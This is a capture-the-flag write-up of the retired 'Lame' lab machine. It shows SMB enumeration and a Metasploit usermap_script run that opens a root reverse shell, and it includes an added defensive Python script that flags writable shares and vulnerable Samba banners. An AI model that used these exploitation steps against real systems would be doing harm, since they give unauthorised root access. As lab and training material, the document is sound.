I signed up for VIP and ordered the retired machines by owns, descending. I figured this was a reasonable proxy for difficulty, ignoring the user-supplied ratings. That meant the first box was Lame. I have heard of it, but I’ve never done it and I don’t know anything about it.


We’ve got FTP, SSH, and SMB on 139/445. It’s a Linux box.


We’ve got anonymous login. It’s vsftpd 2.3.4, which was a version that got backdoored; however, some enumeration indicates we don’t have the vulnerable version. We don’t seem to be able to put files and there are no files available on the server. Let’s move on.


Really this is all we’ve got left. We can get some information:

└─# smbmap -d workgroup -H 
[+] IP:  Name:                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
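
For the defensive side of this listing, here is an added example (not part of the original write-up) that parses smbmap output in the layout above and reports the two things an administrator would want to fix: shares the scanning session can write to, and Samba banners in the range the usermap_script module targets. The range 3.0.20 through 3.0.25rc3 is taken from the Metasploit module's description and is an assumption here; the sample text and all function names are constructed for illustration.

```python
import re

# Constructed sample, in the layout of the smbmap listing shown above.
SAMPLE = """\
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
"""

ROW = re.compile(r"^\s*(.+?)\s{2,}(NO ACCESS|READ ONLY|READ, WRITE)(?:\s+(.*))?$")
BANNER = re.compile(r"Samba (\d+)\.(\d+)\.(\d+)(pre\d+|rc\d+)?")


def parse_shares(text):
    """Return (share, permission, comment) for every share row in the listing."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rows.append((m.group(1), m.group(2), (m.group(3) or "").strip()))
    return rows


def in_usermap_range(banner):
    """Assumed range: 3.0.20 through 3.0.25rc3, per the Metasploit module text."""
    m = BANNER.search(banner)
    if not m:
        return False
    ver = tuple(int(x) for x in m.group(1, 2, 3))
    suffix = m.group(4) or ""
    if ver == (3, 0, 25):  # only pre-releases up to rc3 are in range
        return suffix.startswith("pre") or suffix in ("rc1", "rc2", "rc3")
    return (3, 0, 20) <= ver <= (3, 0, 24)


def triage(text):
    """Findings a defender would act on: writable shares and in-range banners."""
    findings = []
    for share, perm, comment in parse_shares(text):
        if "WRITE" in perm:
            findings.append(f"{share}: writable by the scanning session ({perm})")
        if in_usermap_range(comment):
            findings.append(f"{share}: banner in affected range: {BANNER.search(comment).group(0)}")
    return findings


if __name__ == "__main__":
    print("\n".join(triage(SAMPLE)))
```

A banner match only says the version is old enough to be worth checking; whether the host is exposed also depends on its configuration, so treat the finding as a prompt to patch and review smb.conf.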

Okay, we have a writeable share. We’ll go with Metasploit, even though I don’t usually:

msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)

msf6 exploit(multi/samba/usermap_script) > set rhosts
rhosts =>
msf6 exploit(multi/samba/usermap_script) > set lhost
lhost =>
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 
[*] Command shell session 1 opened ( -> at 2021-03-05 04:16:07 -0500

id;hostname;uname -a;date
uid=0(root) gid=0(root)
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Fri Mar  5 04:34:19 EST 2021

No doubt they get more difficult from here!